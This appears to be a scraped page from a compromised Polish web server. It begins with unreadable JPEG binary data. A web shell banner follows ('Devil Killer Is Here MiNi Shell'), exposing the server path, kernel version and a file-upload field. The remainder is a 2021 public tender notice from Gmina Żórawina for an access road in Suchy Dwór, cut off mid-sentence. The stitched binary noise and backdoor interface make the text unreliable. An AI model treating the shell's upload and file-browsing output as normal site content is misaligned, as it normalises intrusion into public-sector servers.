JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210708/0010865101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00108651 z dnia 2021-07-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Suchy Dwór droga dojazdowa do gruntów rolnych – etap II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Gminy w Żórawinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935141</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żórawina</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zorawina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zorawina.bip.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Suchy Dwór droga dojazdowa do gruntów rolnych – etap II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-16d534f7-df19-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00108651</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004592/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Suchy Dwór droga dojazdowa do gruntów rolnych - etap II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zorawina.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zorawina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej, w tym<br/>przekazywania przedmiotowych środków dowodowych, podmiotowych środków dowodowych oraz<br/>innych oświadczeń i dokumentów, zostały opisane poniżej: 1) Do połączenia używany jest szyfrowany<br/>protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL<br/>zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na<br/>Platformie ma dostęp do możliwości złożenia, wycofania oferty, a także funkcjonalności pozwalających<br/>na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. 2)<br/>Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy: a) Dopuszczalne<br/>przeglądarki internetowe: − Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet<br/>Explorer 11, − Google Chrome 31 − Mozilla Firefox 26 − Opera 18 b) Pozostałe wymagania<br/>techniczne: − dostęp do sieci Internet − obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax−<br/>włączona obsługa JavaScript − zalecana szybkość łącza internetowego powyżej 500 KB/s −<br/>zainstalowany Acrobat Reader - zainstalowane środowisko uruchomieniowe Java - Java SE Runtime<br/>Environment 6 Update 24 lub nowszy c) Wspierane są rozwiązania dostarczane przez firmy: − Polskie<br/>Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A. −<br/>Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A. − Powszechne<br/>Centrum Certyfikacji Certum firmy Asseco Data Systems S.A. (dawniej: Unizeto Technologies SA.) −<br/>Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A. 3) Dopuszczalne<br/>format przesyłanych danychimage/bmp, image/x-windows-bmp, application/msword,<br/>application/drafting, image/gif, application/x-compressed, application/x-gzip, multipart/x-gzip,<br/>image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png,<br/>application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff,<br/>image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip,<br/>application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma,<br/>application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad,<br/>application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad,<br/>image/vnd.dwg, drawing/dwg4) Kodowanie i oznaczenie czasu przekazania danych Czas zapisywany<br/>jest w formacie YYYY-MM-DD HH:MM:SS. Za datę przekazania oferty, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę ich wpływu na Platformę, a nie datę wykonania danej czynności przez Wykonawcę na Platformie.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zorawina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem danych<br/>osobowych jest Wójt Gminy Żórawina, ul. Kolejowa 6, 55-020 Żórawina, tel. 71 38 14 111, e-mail:<br/>urzad@zorawina.pl2. W sprawach związanych z przetwarzaniem danych osobowych, można<br/>kontaktować się z Inspektorem Ochrony Danych, którym jest Mariusz Opaliński za pośrednictwem<br/>adresu e-mail: iod@zorawina.pl.1.4 Dane osobowe będą przetwarzane w celu przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego pn. : Przebudowa drogi wojewódzkiej nr 395 w<br/>zakresie poprawy nawierzchni chodnika w miejscowości Nowojowice – etap od II do V3. Podstawę<br/>prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych oraz<br/>wyrażenie zgody w momencie złożenia oferty, gdy wykonawcą jest osoba fizyczna prowadząca<br/>działalność gospodarczą.4. Dane osobowe będą ujawniane Wykonawcom oraz wszystkim<br/>zainteresowanym, a także podmiotom przetwarzającym dane na podstawie zawartych umów, zgodnie<br/>z art. 74 PZP.5. Dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy<br/>a następnie 5 lat, albo 15 lat w przypadku zamówień współfinansowanych ze środków UE, począwszy<br/>od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu obowiązywania umowy.<br/>Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako<br/>najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).6. Osobie, której dane dotyczą<br/>przysługuje prawo dostępu do danych a także, na warunkach określonych w przepisach<br/>Rozporządzenia Parlamentu i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE, prawo sprostowania danych, ich usunięcia oraz<br/>ograniczenia przetwarzania. Osobie, której dane dotyczą przysługuje prawo wniesienia skargi do<br/>organu nadzorczego. 7. Podanie danych osobowych bezpośrednio osoby, której dane dotyczą jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego. Brak ich podania może uniemożliwić Zamawiającemu dokonanie<br/>oceny spełniania warunków udziału w postępowaniu oraz zdolności Wykonawcy do należytego<br/>wykonania zamówienia, co skutkować może wykluczeniem Wykonawcy z postępowania lub<br/>odrzuceniem jego oferty.8. W odniesieniu do danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.<br/>1), dalej RODO.9. Osoba, której dane dotyczą ma prawo:1) na podstawie art. 15 RODO dostępu do<br/>danych osobowych jej dotyczących,2) na podstawie art. 16 RODO do sprostowania danych<br/>osobowych;3) na podstawie art. 18 RODO żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,4) prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie<br/>danych osobowych, które jej dotyczą narusza przepisy RODO.10. Dane nie będą udostępniane poza<br/>obszar EOG.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG.IT.271.9.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 171582,28 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Obszar inwestycji zlokalizowany jest w Suchym Dworze, na terenie gminy Żórawina w powiecie wrocławskim. Projekt obejmuje przebudowę drogi gminnej o długości 494.56m. Inwestycja obejmuje drogi zlokalizowane na działce oznaczonej w ewidencji gruntów120, 127, 131/2 – obręb Suchy Dwór.<br/>Projekt przewiduje wykonanie nawierzchni bitumicznej szerokość 4.00 m. W km 0+235 – km 0+270 zaprojektowano mijankę o szerokości 5.0 m. Droga ograniczona będzie obustronnie poboczem z kruszywa. Zaprojektowano konstrukcję nawierzchni jezdni składającą się z warstwy ścieralnej i wiążącej z betonu asfaltowego AC11 50/70 o grubości 4cm każda. Nawierzchnia układana będzie na warstwie podbudowie z kruszywa łamanego, stabilizowanego mechanicznie 0/63 mm o grubości 20. Z powodu złych warunków gruntowych zaprojektowano wzmocnienie podłoża gruntowego kruszywem o frakcji 80-150mm o grubości 15 cm. Zaprojektowano pobocza z kruszywa łamanego stab. mech. 0/31.5 mm gr. 10 cm. Droga przebiegają w otoczeniu wydzielonych działek rolnych. <br/>Wykonany został w latach poprzednich etap I polegający na wykonaniu wymiany gruntu oraz podbudowy z kruszywa łamanego stabilizowanego mechanicznie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień polegających na powtórzeniu podobnych robót budowlanych, o których mowa w art. 214 ust. 1 pkt. 7 PZP.<br/>Zamówienia takie:<br/>1.	zostaną udzielone na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki na podstawie art. 214 ust. 1 pkt. 7 PZP;<br/>2.	nie będą łącznie przekraczać kwoty 200 000,00 zł brutto;<br/>3.	mogą zostać udzielone w terminie 3 lat od dnia udzielenia zamówienia podstawowego;<br/>4.	mogą objąć swoim zakresem w szczególności:<br/>- wykonanie nawierzchni bitumicznej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty dla każdego z Zadań<br/>Zamawiający będzie kierować się następującymi kryteriami i ich wagami oraz w następujący sposób<br/>będzie oceniać oferty w poszczególnych kryteriach:LP KRYTERIUM WAGA1. CENA 602.<br/>GWARANCJA JAKOŚCI 402. W kryterium 1 - CENA najwyższą liczbę punktów (60 pkt) otrzyma oferta<br/>Wykonawcy zawierająca najniższą cenę brutto, a każda następna odpowiednio zgodnie ze wzorem:<br/>Liczba punktów oferty = (Cena najniższa spośród złożonych ofert/ Cena oferty ocenianej )x 60 pkt 3. W<br/>kryterium 2 - GWARANCJA JAKOŚCI - najwyższą liczbę punktów (40) otrzyma oferta tego<br/>Wykonawcy, który zaproponuje najdłuższy okres dla gwarancji jakości, natomiast pozostali Wykonawcy<br/>otrzymają odpowiednio mniejszą liczbę punktów obliczoną zgodnie z poniższym wzorem: Liczba<br/>punktów oferty = (okres gwarancji w badanej ofercie/ najdłuższy okres gwarancji ) x 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej wymienione warunki udziału w postępowaniu na podstawie art. 112 ustawy Pzp dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunku w tym zakresie.<br/>2)	sytuacji ekonomicznej i finansowej, tj.:<br/>2.1)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 100 000,00 zł.<br/>3)	zdolności technicznej lub zawodowej, tj.:<br/>3.1)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonali co najmniej 2 roboty polegające na wykonaniu nawierzchni bitumicznej o pow. 1000 m2 z podaniem ich rodzaju oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie<br/>3.2)	dysponują oraz skierują do realizacji zamówienia osobę legitymujące się kwalifikacjami zawodowymi, uprawnieniami i doświadczeniem, tj.:<br/>i)	Wykonawca dysponuje 1 osobą do pełnienia funkcji Kierownika budowy posiadającą ważne uprawnienia budowlane bez ograniczeń, specjalności konstrukcyjno-budowlanej lub drogowej upoważniające do kierowania robotami budowlanymi bez ograniczeń, nadane zgodnie z ustawą Prawo budowlane, do sprawowania samodzielnych funkcji technicznych w budownictwie obejmujące kierowanie budową (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów),<br/>- doświadczenie w pełnieniu obowiązków kierownika budowy przy realizacji min. dwóch robót budowlanych w zakresie wykonania nawierzchni bitumicznej o powierzchni min. 1000 m2 – jako kierownik budowy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1) dokumenty potwierdzające, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną określoną przez Zamawiającego;1.2) wykaz robót budowlanych wykonanych nie<br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, , przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Zaleca się sporządzenie wykazu na<br/>wzorze, który stanowi Załącznik 4 do IDW;1.3) wykaz osób, skierowanych przez Wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług jako<br/>kierownik budowy</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymagać będzie wniesienia wadium w wysokości:<br/>1)	2 000,00 zł (słownie: dwa tysiące złotych 00/100 zł) <br/>- przed upływem terminu składania ofert określonym w SWZ.<br/>2.	Wadium może być wnoszone w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2019 r. poz. 310, 836 i 1572).<br/>1.3	Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy w Banku Spółdzielczym w Kątach Wrocławskich oddział w Żórawinie 67 9574 1028 2002 0013 0013 0004 z dopiskiem – WADIUM /: Suchy Dwór droga dojazdowa do gruntów rolnych – etap II<br/>3.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których<br/>mowa w art. 108 PZP, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy<br/>wykazują zgodnie z § 6 ust. 2 IDW.3) W przypadku wspólnego ubiegania się o zamówienie<br/>przez Wykonawców, 